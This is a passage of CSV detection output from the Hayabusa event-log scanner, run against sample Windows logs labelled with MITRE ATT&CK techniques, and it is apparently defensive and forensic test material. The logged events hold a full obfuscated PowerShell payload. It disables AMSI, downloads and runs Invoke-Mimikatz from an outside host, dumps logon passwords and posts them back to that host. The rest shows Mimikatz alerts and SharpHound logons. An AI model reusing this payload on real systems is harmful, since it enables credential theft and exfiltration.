2W61d32t73}110,118,111}107d101W45W77z105}109}105,107d97z116d122W32d45t67z111A109W109}97d110t100t32A39,112A114}105N118W105}108N101}103z101N58,58t100d101t98z117t103W32W115W101}107t117d114z108A115}97,58N58W108A111A103A111}110A112A97A115N115z119d111}114d100A115N32N101,120}105}116z39}10,36A114}101z113d117N101}115t116N32d61t32A91}83d121A115W116W101d109t46N78t101A116A46}87z101W98z82t101W113d117A101t115d116d93d58N58W67,114}101d97A116}101z40}39N104N116}116t112,115W58t47d47N49A48d46}50A51A46}49,50N51N46}49A49,58t52d52}51}47}39}41A10z36N114}101z113z117N101A115W116A46d77t101W116W104A111t100,32,61z32,39d80,79,83W84d39z10}36t114A101t113d117W101t115N116z46d67}111A110t116z101z110}116t84d121}112A101}32A61t32A39z97d112W112W108}105,99N97d116t105}111z110z47}120}45A119t119z119}45N102,111N114}109A45d117A114t108z101N110A99A111}100}101A100z39A10t36z98}121,116A101z115A32A61}32}91N83}121A115W116N101d109A46}84}101W120N116}46N69,110}99W111W100}105t110,103A93,58A58z65z83W67d73t73W46A71N101}116t66}121,116A101}115A40,36N99A109A100A41z10A36A114z101A113}117,101N115A116W46,67d111d110z116z101t110A116}76}101z110t103}116A104,32}61t32N36d98,121N116z101}115N46}76z101N110,103z116W104}10A36d114d101A113N117}101A115d116}83z116A114A101,97N109z32,61}32}36}114W101t113N117,101W115A116}46A71}101W116A82z101A113A117N101t115N116t83A116A114}101d97d109}40}41t10z36A114t101d113A117}101A115A116A83N116}114d101}97W109A46,87z114d105,116A101,40}36W98N121z116z101t115}44A32z48}44d32}36A98W121t116A101}115W46,76N101t110W103}116,104t41d10A36z114N101}113A117}101}115d116}83A116N114t101W97W109W46,67}108}111}115d101t40t41A10z36W114}101t113t117N101A115N116t46d71t101W116}82W101z115}112}111A110d115}101}40,41'.SPlIT('Nz}tAdA,}W') | ForEach-ObJEct { ([int] $_ -AS [ChAR]) } ) +$( set-itEM 'VaRiAble:Ofs' ' ' ) )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:55.923 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Variable): ""Set-Variable"" ParameterBinding(Set-Variable): name=""Name""; value=""Ofs"" ParameterBinding(Set-Variable): name=""Value""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:55.942 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ ([int] $_ -AS [ChAR]) },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:56.691 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Item): ""Set-Item"" ParameterBinding(Set-Item): name=""Path""; value=""VaRiAble:Ofs"" ParameterBinding(Set-Item): name=""Value""; value="" """,rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:56.725 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Invoke-Expression): ""Invoke-Expression"" ParameterBinding(Invoke-Expression): name=""Command""; value=""[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('https://10.23.123.11:443/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('https://10.23.123.11:443/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()"" TerminatingError(Invoke-Expression): ""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:56.725 +00:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.253 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.255 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.274 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.369 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.422 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.425 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.450 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.469 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.477 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-String): ""Out-String"" CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""Transcript""; value=""True"" ParameterBinding(Out-String): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software."" ParameterBinding(Out-Default): name=""InputObject""; value=""Invoke-Expression : At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:1 char:1 + . ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}10 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand """,rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.512 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.513 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.522 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.524 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.542 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.542 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.556 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.597 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.615 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""At line:1 char:1 + [Net.ServicePointManager]::ServerCertificateValidationCallback = {$tr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-04-30 20:32:57.626 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-03 08:16:43.008 +00:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx +2021-05-03 08:16:43.017 +00:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx +2021-05-03 08:58:25.921 +00:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:25.942 +00:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:25.949 +00:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:25.950 +00:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.674 +00:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.677 +00:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.679 +00:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.685 +00:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.686 +00:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.686 +00:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.687 +00:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.687 +00:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.688 +00:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.689 +00:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.689 +00:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.689 +00:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.690 +00:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.691 +00:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.712 +00:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.713 +00:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.713 +00:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.714 +00:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.715 +00:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.718 +00:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.722 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.733 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.734 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.735 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.742 +00:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.742 +00:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.752 +00:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.753 +00:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.753 +00:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 